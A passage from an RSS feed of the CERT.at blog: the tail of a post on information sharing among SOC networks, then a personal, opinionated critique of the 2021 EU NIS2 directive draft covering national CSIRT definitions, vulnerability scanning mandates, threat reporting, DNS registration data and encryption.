&lt;p class=&quot;block&quot;&gt;A decent Identity and Access management covering all these tools is recommended (but not strictly necessary in the first iteration). The toolset created for the CSIRTs Network (&lt;a href=&quot;https://github.com/melicertes/docs?linkId=191595424&quot;&gt;MeliCERTes 2&lt;/a&gt;) can help here.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Exchange of Information&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In the end, the main motivation of such network is information sharing with the intention of making members more effective in their core task. Here are some thoughts on that aspect:&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Compatible levels of Maturity&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If members are at very different levels of technological and organisational maturity, then any information exchange is of limited value. A common baseline is helpful.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Human to Human&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is the easiest information exchange to get going, and some topics really need to be covered on the human layer: people can talk about experiences, about cases, about what works and what does not.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It is also possible to exchange Cyber Threat Intelligence (CTI) between humans: the typical write-up of a detected APT campaign, including all the Indicators (IoCs) found during the incident response, is exactly that.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This sounds easy, but is costly in terms of human time. On the receiving side, the SOC needs to operationalize the information contained to make the automated systems detect a similar campaign in the local constituency.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Information Management&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The way a SOC is gathering, storing, correlating and de-duplicating the CTI that is powering its detection capability is a core element in the SOC internal workflow. Its maturity in this respect drives the possibilities of collaboration on the topic of CTI.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One (not uncontroversial) theory on this topic is the &amp;ldquo;&lt;a href=&quot;http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html&quot;&gt;Pyramid of Pain&lt;/a&gt;&amp;rdquo; concept from David Bianco, where he describes the levels of abstractions in CTI. The lower levels are easy for SIEMs to detect, but also trivial for the threat actor to change. The challenge for SOCs is to operate at a higher level than what the threat actors is prepared to change frequently.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;CTI M2M&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In theory, SOCs should be able to cross-connect their CTI systems to profit from each other&amp;rsquo;s learnings and thus increase the overall detection capability of SOC Network. Regrettably, this is non-trivial on multiple fronts:&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Data protection / customer privacy&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;They must be ensure that no information about the customer where the CTI was found during IR, leaks out. Sometimes this is easy and trivial sometimes it is not. Thus, unless the SOC is very mature at entering CTI into their system, people will want to check manually what is being shared.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Data licencing&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Many SOCs buy CTI data from commercial sources. Such data needs to be excluded from automatic data sharing.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Data compatibility&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;While there are a number of standards for CTI data exchange (e.g., STIXX/TAXII, MISP or Sigma rules), this is far from being a settled topic. Especially if you want to move up in the pyramid of pain.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Sharing tools&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In addition to sharing information, it is also possible that members of the network share the tools they have written to perform various aspects of a SOCs job.&lt;/p&gt;</description><pubDate>Fri, 07 Jul 2023 15:37:15 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2023/7/a-network-of-socs</guid><dc:creator>CERT.at</dc:creator><dc:date>2023-07-07T15:37:15Z</dc:date></item><item><title>An update on the state of the NIS2 draft</title><link>https://www.cert.at/en/blog/2021/11/an-update-on-the-state-of-the-nis2-draft</link><description>&lt;p class=&quot;block&quot;&gt;This is a TLP:WHITE summary of my presentation at the 15th CSIRTs Network meeting in Ljubljana on November 11th. This is not a complete review of the current state of the NIS2 discussions.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Overall, I think the council should abandon the idea of finishing the text this year. There is too much in flux and we all lost sense if the text is still consistent. I recommend publishing a new consolidated draft and get a new round of public comments. We reached the limit of high-speed tinkering with the text.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post may sound negative. That is selection bias, as I primarily write about the things that need changing, not the other parts with which I agree.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Update 2021-11-18:&lt;/strong&gt; More text on scanning and some links added.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;References&lt;/h1&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;NIS2&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=COM:2020:823:FIN&quot;&gt;Original Proposal&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;Presidency draft of Oct 26. (limite, thus no link. &lt;strong&gt;EDIT:&lt;/strong&gt; The &lt;a href=&quot;https://data.consilium.europa.eu/doc/document/ST-14337-2021-INIT/en/pdf&quot;&gt;final text was published 2021-12-03&lt;/a&gt;)&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.europarl.europa.eu/meetdocs/2014_2019/plmrep/COMMITTEES/ITRE/PR/2021/10-28/1230231EN.pdf&quot;&gt;EP Position from ITRE&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;My blog posts&#13;
&lt;ul&gt;&#13;
&lt;li&gt;On &lt;a href=&quot;https://cert.at/en/blog/2018/8/blog-20180731155524-2252&quot;&gt;National CSIRTs&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;On the &lt;a href=&quot;https://cert.at/en/blog/2021/1/nis2-recitals-feedback&quot;&gt;NIS2 Recitals&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;On the &lt;a href=&quot;https://cert.at/en/blog/2021/3/nis2-proposal-first-feedback-on-the-normative-text&quot;&gt;normative text&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h1&gt;Disclaimer&lt;/h1&gt;&#13;
&lt;p&gt;These are my personal opinions; this is &lt;strong&gt;not&lt;/strong&gt; the official position of Austria. I talk a lot to our representative in the Horizontal Working Party for Cyber Issue. He is the diplomatic one; I prefer to call things as I see them.&lt;/p&gt;&#13;
&lt;h1&gt;&quot;National CSIRT&quot;&lt;/h1&gt;&#13;
&lt;p&gt;Historically, the term &quot;national CSIRT&quot; had a clear meaning: The Default CSIRT of a country, the main liaison point for international relations and the primary info-sharing hub inside the country. This can only be a coordinating / advising CSIRT, it usually has no enforcing powers. Its constituency is the whole country (however that is defined in cyberspace).&lt;/p&gt;&#13;
&lt;p&gt;NIS1 botched this&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;That role is never even implied (The CSIRTs cover only the NIS sectors!)&lt;/li&gt;&#13;
&lt;li&gt;An alternative meaning is not defined&lt;/li&gt;&#13;
&lt;li&gt;But the term is used in a few places&lt;/li&gt;&#13;
&lt;li&gt;After long discussions, the CSIRTs Network kind of agreed that all CSIRTs that are accredited according to the NIS transpositions and that cover at least a NIS sector, are &quot;national CSIRTs&quot;&lt;/li&gt;&#13;
&lt;li&gt;The wording caused us many headaches during the ToR/RoP update of 2018.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;NIS2 does not fix this deficiency in the text.&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;It still contains no definition&lt;/li&gt;&#13;
&lt;li&gt;The word is used in Rec. (13), (25), Art. 9, 13&lt;/li&gt;&#13;
&lt;li&gt;We managed to fix some of them in the current draft. See below.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2&gt;Two problems: Gaps in the constituency + unclear usage&lt;/h2&gt;&#13;
&lt;p&gt;&quot;CSIRTs that cover the NIS sectors&quot; turned out to be a problem as a relevant part of the country is not covered by a CSIRT. Our colleagues in the NCSC-NL had serious problems because they are operating for a strictly defined constituency. Whenever they learn of some danger to other Dutch entities, they are forced to sit on their hands instead of reaching out and helping. &quot;Not in their constituency -&amp;gt; No rights to process data&quot;&lt;/p&gt;&#13;
&lt;p&gt;Austria solved this in the national transposition:&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;&amp;sect;14 NISG: &quot;(6)&lt;/strong&gt; CSIRTs can perform the tasks pursuant to para 2 subparas 3 to 5 also with regard to other entities or persons if such entities or persons are affected by a risk or incident in their network and information systems.&quot; &lt;/em&gt;&lt;/p&gt;&#13;
&lt;h2&gt;Suggestion&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Clean up the language: Use &quot;NIS CSIRTs&quot; for the teams that are accredited according to Article 9/10&lt;/li&gt;&#13;
&lt;li&gt;There is value in actually defining the role of a real national CSIRT.&#13;
&lt;ul&gt;&#13;
&lt;li&gt;This can be done analogous to Art 6 (1): &quot;&lt;em&gt;Each Member State shall designate one of its CSIRTs as referred to in Article 9 as a coordinator for the purpose of coordinated vulnerability disclosure.&lt;/em&gt;&quot;&lt;/li&gt;&#13;
&lt;li&gt;Define the tasks for the national CSIRT: act as a coordinating CSIRT for the whole country.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Decide for all occurrences of &quot;national CSIRT&quot; in the text what definition should actually apply: &quot;NIS CSIRT&quot; or the &quot;national CSIRT&quot;.&lt;/li&gt;&#13;
&lt;li&gt;Be careful about international collaboration. What are the corresponding teams in third countries? (Yes, we need that collaboration.)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h1&gt;Definition of CSIRTs (Article 9)&lt;/h1&gt;&#13;
&lt;p&gt;On the Commission and Council side, I see no real problem except for the missing national scope (see above). The Parliament went a bit overboard:&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&quot;Member States shall ensure the possibility of effective, efficient and secure information exchange on &lt;strong&gt;all classification levels&lt;/strong&gt; between their own CSIRTs and CSIRTs from third countries on the same classification level.&quot; &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;With the broad scope of NIS2 and sectoral CSIRTs operating with small teams, this is completely unworkable. For coordinating CSIRTs, this is also unneccessary.&lt;/p&gt;&#13;
&lt;h1&gt;Requirements and Tasks (Article 10)&lt;/h1&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 10(1)(d)&lt;/strong&gt; &quot;CSIRTs shall be adequately staffed to ensure availability at all times;&quot;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;What does this mean? A manned team 24x7 on-site or just one analyst on on-call duty? The former proved to be unworkable (just ask NCSC-NL), the latter makes a lot more sense.&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 10(2)(a)&lt;/strong&gt; monitoring cyber threats, vulnerabilities and incidents at national level; and (e) [proactive scanning, language in flux]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;We need clearer language on scanning for vulnerabilities. As suitable definition would be e.g.:&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&quot;(e) conducting, upon identified operational needs, a proactive scanning of the network and information systems of CSIRT constituency area, including a member state-wide scan, to detect vulnerabilities with potential significant impact, provided [text on safeguards]. An essential or important entity could request a specific scan of their own resources from a CSIRT serving the entity constituency. &quot; &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;Update 2021-11-18:&lt;/strong&gt; after a bit more reflection, this is my position on scanning:&lt;/p&gt;&#13;
&lt;p&gt;For any scanning done on request of the entity we don't need any safety clauses like &quot;no intrusions&quot;, &quot;no access&quot;, &quot;no negative impact&quot;, as these scans basically amount to a light form of penetration test that are done frequently by commercial consulting companies. Such a service usually is done after a &quot;permission to attack&quot; document was signed, which clearly lays out the limits and risks of the activity.&lt;/p&gt;&#13;
&lt;p&gt;I don't think we need a specific clause in the directive on this. From my PoV, adding something like &quot;on request by a constituent, a CSIRT can assist with proactive security measures&quot; to the list of Article 10 (2) might be helpful. It doesn't have to be scans, it can be a review of a policy/design, some generic consulting, ...It needs to be a &quot;may&quot; clause, because this is open-ended and can consume boundless resources at the CSIRT.&lt;/p&gt;&#13;
&lt;p&gt;Scanning your constituency for vulnerabilities is a valuable tool for a national CSIRT. We do this every &lt;a href=&quot;https://cert.at/de/services/statistic-survey/&quot;&gt;now and then&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p&gt;Important point to note here: There is little point in doing such scans on demand. We do this because organisations might have missed to install an update. If they have e.g. &quot;ProxyShell&quot; in focus, they can just look at their infrastructure, there is no need to ask the CSIRT for a scan.&lt;/p&gt;&#13;
&lt;p&gt;So these scans &lt;strong&gt;need&lt;/strong&gt; a legal basis. But now the increased Scope of NIS2 is biting us:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;the number of entities is rising by up to two orders of magnitude&lt;/li&gt;&#13;
&lt;li&gt;the CSIRTs don't know who is covered in advance It is thus &lt;strong&gt;really&lt;/strong&gt; hard for a national CSIRT to restrict scanning activities to the &quot;important&quot; and &quot;essential&quot; entities.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;What we really need here is the license to scan the whole country.&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;(end update)&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;The international cooperation, as defined in the Presidency draft is very welcome.&lt;/p&gt;&#13;
&lt;p&gt;Again, the Parliament went overboard:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;1a. CSIRTs shall develop at least the following technical capabilities:&#13;
&lt;ul&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;(a) the ability to conduct real-time or near-real-time monitoring of networks and information systems, and anomaly detection;&lt;/li&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;(b) the ability to support intrusion prevention and detection;&lt;/li&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;(c) the ability to collect and conduct complex forensic data analysis, and to reverse engineer cyber threats;&lt;/li&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;(d) the ability to filter malign traffic;&lt;/li&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;(e) the ability to enforce strong authentication and access privileges and controls; and&lt;/li&gt;&#13;
&lt;li style=&quot;padding-left: 30px;&quot;&gt;(f) the ability to analyse cyber threats&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Phew. &quot;Ability to filter malign traffic&quot; for a real national CSIRT? &lt;strong&gt;That is very thin ice.&lt;/strong&gt; &quot;Enforce&quot; anything? That might work for a GovCERT, but never ever for a coordinating sectoral one.&lt;/p&gt;&#13;
&lt;h1&gt;CSIRTs Network (Article 13)&lt;/h1&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 13(1)&lt;/strong&gt; In order to contribute to the development of confidence and trust and to promote swift and effective operational cooperation among Member States, a network of the national CSIRTs is established.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;Drop the &quot;national&quot; here, please.&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 13(2)&lt;/strong&gt; The CSIRTs network shall be composed of representatives of the Member States' CSIRTs and CERT-EU.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;Representatives? This is not the Cooperation Group where &quot;composed of representatives of Member States&quot; makes sense. The CNW is more than just the meeting of the representatives three times per year. So drop &quot;representatives&quot; here. Our teams are the members, not just the liaison officers. We talked about the need for a broad participation of the teams at the meeting in Ljubljana.&lt;/p&gt;&#13;
&lt;p&gt;Which CSIRTs? NIS (see Art. 9), the national one, or any CSIRT? I think a reference to Article 9 is the correct answer and is what we use right now in the CNW ToR.&lt;/p&gt;&#13;
&lt;p&gt;The Presidency changes (ba) [Sharing Publications &amp;amp; Recommendations] and (bb) [Sharing Tools] are good.&lt;/p&gt;&#13;
&lt;h1&gt;Scope of NIS2&lt;/h1&gt;&#13;
&lt;p&gt;The scope of the NIS2 was a major part of the discussions in the council. I don't worry about the details regarding important vs. essential entities, I worry about:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Scale: the pure number of entities. Probably a factor 20 to 50 over the NIS1 numbers&lt;/li&gt;&#13;
&lt;li&gt;Our tasks, e.g. EP: &quot;&lt;em&gt;(c) responding to incidents and providing assistance to the entities involved;&lt;/em&gt;&quot;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;If you see the CSIRTs as hands-on entities that are involved in on-site incident response in their constituency, then this role will not scale with the proposed numbers of organization. I see little chance that the NIS CSIRTs will cover all the Incident Response capability that all the important/essential entities will need, as this would close to monopolize that job in an EU member state. Thus, the logical conclusion is to reduce the hands-on part of CSIRTs as the size of the constituency increases. The extreme point is the role of the national CSIRT, which is purely a coordination and info-sharing function.&lt;/p&gt;&#13;
&lt;h1&gt;Voluntary Reports vs. CVD&lt;/h1&gt;&#13;
&lt;p&gt;I still think that the voluntary reporting is more important than the mandatory one. We are way too new to the whole NIS thingy to be able to say how this will really work out. The identification of all OeS just finished here. Give it time to develop.&lt;/p&gt;&#13;
&lt;p&gt;Be careful when transposing: Reports can be about other people's systems, which is a special case of Responsible Disclosure. Example: &quot;Dear CSIRT, I spotted the following bug in the website of company X, please help getting this fixed.&quot; We messed up in Austria on our NIS1 transposition, our law says &quot;&lt;em&gt;(2) Entities which have not been identified as operators of essential [...] can submit notifications of risks, incidents and security incidents &lt;strong&gt;concerning them&lt;/strong&gt; to the competent CSIRT [...]&lt;/em&gt;&quot;. We should have left out the two words &quot;concerning them&quot;.&lt;/p&gt;&#13;
&lt;p&gt;So what really is the difference between the coordinated vulnerability disclosure (CVD) and a voluntary report on a weakness in an online service? In first case, the bug is in the software itself, whereas in the latter the mistakes might also have been in the configuration or deployment of the software. As we are moving from the distribution of software via physical media in shrink-wrapped boxed to online distribution (including automatic updates) and Software-as-a-Service (Google Docs, Salesforce, (parts of) Office 365, so is the process of dealing with vulnerabilities changing. The world of software licensing is also making this switch, see e.g. the move from &lt;a href=&quot;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&quot;&gt;GPL2&lt;/a&gt; to the &lt;a href=&quot;https://en.wikipedia.org/wiki/GNU_Affero_General_Public_License&quot;&gt;GNU AGPLv3&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p&gt;I really think we need to re-examine what this evolution of software / services implies for the distinct NIS2 concepts of coordinated vulnerability disclosure, voluntary reporting, network scanning (Article 10(2)(e)) and the job of a truly national CSIRT.&lt;/p&gt;&#13;
&lt;h1&gt;Threats&lt;/h1&gt;&#13;
&lt;p&gt;The idea here is sound: do not just report actual outages, but also report when something bad is really close to happening. We had such a case recently in Austria: an OeS discovered an APT like intrusion into their systems. It took them about half a year to finish the incident response process to clean their network. The attacker caused no outage at all. Thus, according to our NIS law, the mandatory reporting requirement never triggered. (In this case, a voluntary report was submitted.) Nevertheless, it felt wrong that having someone inside an OeS with the capability to cause mayhem is not enough to trigger a mandatory report. Based on that thinking, it makes sense that the NIS2 draft also wants reports on threats:&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 20(2)&lt;/strong&gt; Member States shall ensure that essential and important entities notify, without undue delay, the competent authorities or the CSIRT of any significant cyber threat that those entities identify that could have potentially resulted in a significant incident.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;If you trace the citations, you arrive at the following definition: &lt;em&gt;&quot;cyber threat&quot; means any potential circumstance, event or action that could damage, disrupt or otherwise adversely impact network and information systems, the users of such systems and other persons;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;Whoopsie. This is way too generic. Ransomware is a &quot;significant cyber threat&quot; to basically anyone running IT systems. So is the discovery of a 0-day vulnerability in an Internet-facing service. Anyone who isn't aware of a &quot;significant cyber threat&quot; to his/her own organization messed up their risk assessment. It looks to me like the drafters hoped that adding &quot;significant&quot; would be enough, but in my opinion, this does not suffice. &quot;significant&quot; is doing too much heavy lifting here.&lt;/p&gt;&#13;
&lt;p&gt;To be on the safe side, entities need to report their risk assessment (e.g. done as part of their ISO 27001 certification) to the CSIRT. Additionally, this definition triggers on any non-trivial change of the IT setup: those have the nasty property to cause outages every now and then. Yes, we CSIRTs certainly want to see Cc of &lt;a href=&quot;https://wiki.en.it-processmaps.com/index.php/Change_Management&quot;&gt;non-standard changes according to ITIL processes&lt;/a&gt; in our constituency. Not really. And then there are the patch cycles: hardly any Microsoft patch Tuesday fails to deliver a critical update. &quot;Significant Cyber Threat&quot; until patched? Oh yes. And Art. 20(2) triggers and the CSIRT should get a report from all Microsoft customers in the constituency.&lt;/p&gt;&#13;
&lt;p&gt;The language needs more precision here.&lt;/p&gt;&#13;
&lt;h1&gt;Domain Name System Scope&lt;/h1&gt;&#13;
&lt;p&gt;The points on whois access are good.&lt;/p&gt;&#13;
&lt;p&gt;Looking at the provisioning and the resolution side makes a lot of sense (from Presidency draft).&lt;/p&gt;&#13;
&lt;p&gt;But the Scope?&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Root Nameservers? That is a highly political minefield. Demanding security precautions from them is sensible, but enforcement is not possible for most of them. The most I can envision is a reference to some global standard (optimally set by ICANN) and delegate oversight to the respective national bodies from where the operators' headquarters are.&lt;/li&gt;&#13;
&lt;li&gt;TLDs? European ccTLDs are easy, but what about .com? nGTLDs? ...&lt;/li&gt;&#13;
&lt;li&gt;Are we aiming for a global enforcement like with the GDPR? If yes, this needs a very public discussion.&lt;/li&gt;&#13;
&lt;li&gt;What about other public suffixes? E.g., gv.at, gov.ee, com.es, ...&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h1&gt;DNS Registration Data (Article 23)&lt;/h1&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;1. For the purpose of contributing to the security, stability and resilience of the DNS, Member States shall ensure that TLD name registries and the entities providing domain name registration services for the TLD shall collect and maintain accurate and complete domain name registration data in a dedicated database facility with due diligence in accordance with Union data protection law as regards data which are personal data.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;This statement on the purpose is either a bald-faced lie, the result of ignorance about the DNS, or a sleigh of hands in order to insert someone's pet policy objective into the NIS2 directive. Or all three at once.&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;Someone has an agenda. And it is not the security, stability and resilience of the DNS.&lt;/strong&gt; It may be phishing, spamming, business email compromise (BECs) or other cyber-crime topics. The DNS itself doesn't care about the correctness of domain ownership data just as roads don't care about license plates of cars.&lt;/p&gt;&#13;
&lt;p&gt;The Cooperation Group tasked ENISA to write a report on &quot;DNS Stability&quot; declaring that incorrect registration data is the most pressing issue for the functioning of the DNS. &lt;strong&gt;It is not.&lt;/strong&gt; According to the last draft I have seen, the document only quotes a Centr doc on current practices of some TLDs. I worry that that will morph into a hard requirement.&lt;/p&gt;&#13;
&lt;p&gt;The impact of incorrect whois data is far away from the goals of the NIS directive. The E-Commerce directive would be a much better fit for the topic. &lt;strong&gt;We've been hijacked.&lt;/strong&gt; This reminds me of 1995, when the EU passed telecom surveillance policy via the fishery council.&lt;/p&gt;&#13;
&lt;p&gt;This is utterly ridiculous.&lt;/p&gt;&#13;
&lt;p&gt;The scope, overall effect and the un-intended side effects have not been thought through at all.&lt;/p&gt;&#13;
&lt;h2&gt;Scope?&lt;/h2&gt;&#13;
&lt;p&gt;Just as with the basic scope of NIS2, it is not clear which registries (and the associated registrars/resellers) are covered by this article. Is this by home country? By target audience? Is this supposed to be like the GDPR and establish a global requirement for global services?&lt;/p&gt;&#13;
&lt;p&gt;In the case of .com, this has another effect. It is a &quot;thin registry&quot;, meaning that the registry itself does not contain any information on domain owners. It only stores NS, DS, glue records, the sponsoring registrar and some metadata. What do the requirements of NIS2 mean for such a system? Either change to a thick model, or include the distributed whois databases of all .com registrars.&lt;/p&gt;&#13;
&lt;h2&gt;How do you guarantee &quot;accurate&quot;?&lt;/h2&gt;&#13;
&lt;p&gt;Even if a registry wants to implement this, how is it going to do that? eID doesn't even really work across the EU. This is a global market. How can one verify a domain owner from other continents?&lt;/p&gt;&#13;
&lt;p&gt;This might somehow work for certain TLDs, which have historically targeted a very specific set of customers, e.g. a few select ccTLDs (.dk, .fi, ...) or sponsored gTLDs (e.g., .aero, .travel). The vast majority of TLDs do not restrict the ownership of domains at all.&lt;/p&gt;&#13;
&lt;p&gt;Can the registries completely push this requirement on registrars? How big is the scope there? According to the &lt;a href=&quot;https://www.icann.org/en/accredited-registrars&quot;&gt;ICANN website&lt;/a&gt;, we are talking about 2497 ICANN accredited registrars. Not all of them target the EU market. Are they in scope, because .com has a big business in the EU and a thin registry?&lt;/p&gt;&#13;
&lt;h2&gt;Existing domain-owners?&lt;/h2&gt;&#13;
&lt;p&gt;&lt;a href=&quot;https://stats.centr.org/stats/global&quot;&gt;According to Centr&lt;/a&gt;, there are currently 69 Million ccTLD domains in Europe; the global market is around 317 Million domains.&lt;/p&gt;&#13;
&lt;p&gt;How are the registries supposed to verify those? What is the transition/grace period? Has anybody done a cost estimate? Isn't there a legal requirement to do this when you propose a legislation? Ok, there is a &quot;LEGISLATIVE FINANCIAL STATEMENT&quot;, let's have a look: ... impact on DG CNECT ... EU Budget ... ENISA. And that's it.&lt;/p&gt;&#13;
&lt;p&gt;Sheesh.&lt;/p&gt;&#13;
&lt;p&gt;If the commission thinks that this verification is only for new domains, then it should bloody well write it into the directive. If it thinks that this could be done during the domain renewal process, then this reveals yet another level of ignorance about the European domain market.&lt;/p&gt;&#13;
&lt;h2&gt;Market effects?&lt;/h2&gt;&#13;
&lt;p&gt;All this will have a major effect on prices and friction, and thus the competitiveness of the &lt;a href=&quot;https://www.sidn.nl/en/news-and-blogs/nis2-could-seriously-undermine-european-registrars-global-competitiveness&quot;&gt;EU domains in a global market&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h2&gt;Why Domains?&lt;/h2&gt;&#13;
&lt;p&gt;Domains are just one form of online names that are delegated to customers by some sort of registry. We have just as much trouble with Social Media accounts, Cloud service accounts (Cloudflare is very popular by miscreants right now), Webspace, IP-address ownership, email addresses, ...&lt;/p&gt;&#13;
&lt;p&gt;The common denominator with regard to ransomware (the top threat in 2021 according to ENISAs threat landscape report) are crypto currencies. Not invalid domain registrations.&lt;/p&gt;&#13;
&lt;p&gt;The legislators are barking up the wrong tree. Dealing with network abuse is certainly an interesting topic. This needs a fine balance of minimal friction in business versus restrictions to deter and/or stop abuse. This needs the threading of a fine needle. Not a broadsword to one singular network resource.&lt;/p&gt;&#13;
&lt;h2&gt;Alternatives?&lt;/h2&gt;&#13;
&lt;p&gt;First, we need a real problem statement. You cannot develop policy without first clearly laying out what problem a legislation is trying to mitigate (Case in point: the &lt;a href=&quot;https://www.consilium.europa.eu/en/press/press-releases/2021/10/19/cybersecurity-council-adopts-conclusions-on-exploring-the-potential-of-a-joint-cyber-unit/&quot;&gt;JCU&lt;/a&gt;). Then you can start to think of remedies and start drafting laws.&lt;/p&gt;&#13;
&lt;p&gt;This is how I see it:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;We need to be able to deal quickly with network abuse&lt;/li&gt;&#13;
&lt;li&gt;That needs clear guidance on who can act under what circumstances against a network resource&lt;/li&gt;&#13;
&lt;li&gt;Right now, the Austrian law enforcement does not have the right tools&lt;/li&gt;&#13;
&lt;li&gt;Whether the owner of that resource has been properly verified must matter when dealing with a misuse of that resource&lt;/li&gt;&#13;
&lt;li&gt;There are examples. E.g. how CH reacts to domain abuse&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Nevertheless: this is not a topic for the NIS directive.&lt;/p&gt;&#13;
&lt;p&gt;See also the &lt;a href=&quot;https://www.internetsociety.org/blog/2021/11/nis2-security-resiliency-and-dns-server-infrastructure/&quot;&gt;Blog post from the Internet Society&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h1&gt;Encryption (Recital 54)&lt;/h1&gt;&#13;
&lt;p&gt;For god's sake. Don't start to re-litigate the crypto wars of the 90's. It's over. That horse is dead.&lt;/p&gt;&#13;
&lt;p&gt;The EP got it. &quot;&lt;em&gt;However, this should not lead to any efforts to weaken end-to-end encryption, which is a critical technology for effective data protection and privacy&lt;/em&gt;.&quot; is the polite way of saying that the preceding sentence on &quot;reconciling encryption with LE needs&quot; is bullshit.&lt;/p&gt;&#13;
